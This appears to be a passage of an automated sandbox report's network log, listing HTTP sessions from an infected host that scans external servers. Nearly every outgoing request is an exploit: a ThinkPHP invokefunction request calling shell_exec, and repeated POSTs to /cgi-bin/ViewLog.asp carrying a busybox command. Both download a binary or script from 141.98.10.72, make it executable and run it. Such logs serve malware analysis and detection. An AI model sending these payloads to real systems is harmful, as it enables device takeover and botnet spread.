                                                        Feb 14, 2024 09:33:13.196033955 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:13.410614014 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 33 26 23 34 36 3b 31 62 63 34 35 62 38 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;349b1702&#46;1707899593&#46;1bc45b84</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.145987095.179.198.4080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:13.373981953 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:13.564582109 CET505INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Server: lighttpd
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.145794088.192.43.22080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:13.401233912 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:13.619153976 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.144454688.225.225.11980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:13.452987909 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.143657095.101.106.13880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:13.603640079 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:13.833235025 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 33 26 23 34 36 3b 31 35 64 61 30 30 30 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5781002&#46;1707899593&#46;15da0006</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.146001831.136.24.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:15.998456001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.648583889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:17.928695917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:20.616534948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:25.736222982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:35.975960970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.198982000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:37.157402992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.145237631.136.156.2018080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.011034012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.712614059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.120572090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:21.128480911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:26.760198116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:38.023767948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.295062065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349070072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.144828831.200.57.668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.036386967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.145053294.121.78.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.036493063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.145474894.121.154.718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.036581039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.145267694.121.191.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.036681890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.143730862.78.85.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:16.048866987 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:16.346299887 CET1173INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 989
                                                        Date: Wed, 14 Feb 2024 08:33:13 GMT
